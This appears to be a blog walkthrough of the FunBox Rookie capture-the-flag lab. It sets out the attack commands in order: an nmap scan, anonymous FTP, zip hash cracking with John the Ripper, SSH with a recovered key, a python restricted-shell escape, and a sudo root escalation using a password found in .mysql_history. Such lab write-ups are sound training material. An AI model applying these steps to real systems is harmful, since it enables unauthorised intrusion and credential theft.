root@blog:~#

View on GitHub

FunBox Rookie
RECONIp Search
Apache Server
image19

Nmap Scan

nmap -sC -sV 192.168.52.107 

-safe scripts -service version
Anonymous FTP Login available, various visible zip files
image14

ENUMURATION

ftp 192.168.52.107
Name: anonymous 
Password: anonymous@domain.com 

image5
Grab zip Files

 mget homer.zip john.zip tom.zip 

image15
Inspect File
Password locked id_rsa keys
image18
Change zip to Crack Passwords

 zip2john homer.zip homer.hash 

image17
Insall word list

 rockyou.txt 

image12
Organize files into one directory
image4
John the Ripper

 john --wordlist=$rockyou tom.hash 

image3
Extract tom.zip

 iubire 

image2
Id_rsa key
image6

PRIVILEGE ESCALATION

SSH

  ssh -i id_rsa tom@192.168.52.107 

Success logged in as tom
image10
Flag

 cat local.txt  

image8
Restricted Shell
image11
Checking Sudo Privileges
Tom can run all commands definitely worth pursuing
image9
Remove Shell Restrictions

 python3 -c ‘import os; os.system(“/bin/bash”);’ 

image7
Check for hidden files

ls -la 

image16
Reading mysql_history

 cat .mysql_history  

Reveals password
image1

ROOT ESCALATION

Root Flag

 sudo su  
 xx11yy22!  
 cat  proof.txt  

image13